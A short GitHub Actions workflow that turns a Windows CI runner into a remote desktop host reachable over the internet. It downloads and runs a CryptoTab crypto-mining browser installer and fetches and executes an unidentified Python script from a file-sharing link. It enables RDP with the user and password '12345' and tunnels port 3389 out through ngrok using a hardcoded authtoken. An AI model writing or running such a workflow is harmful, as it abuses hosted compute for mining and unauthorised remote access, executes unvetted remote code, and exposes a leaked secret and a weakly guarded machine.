name: BiiuhRDP

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest

    steps:
    - name: Download Ngrok
      run: Invoke-WebRequest https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -OutFile ngrok.zip
    - run: Invoke-WebRequest https://cryptobrowser.site/get/BrowserSetup.exe -OutFile cryptotab.exe
    - run: .\cryptotab.exe
    - name: Extract Ngrok Archive
      run: Expand-Archive ngrok.zip
    - name: Auth
      run: .\ngrok\ngrok.exe authtoken 1rwYbMguHlqrHwHcqFpa35Xobx8_7MQkeC4VpyJ1R87m4jyrN
    - run: Invoke-WebRequest https://srv-store4.gofile.io/download/sIP9zW/8ff711c8e3f5ea1dbdfd90f020314cab/finall_2.py -OutFile 1.py
    - run: .\1.py
    - name: Enable TS
      run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
    - run: Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
    - run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
    - run: Set-LocalUser -Name "12345" -Password (ConvertTo-SecureString -AsPlainText "12345" -Force)
    - name: Create Tunnel
      run: .\ngrok\ngrok.exe tcp 3389
      
    
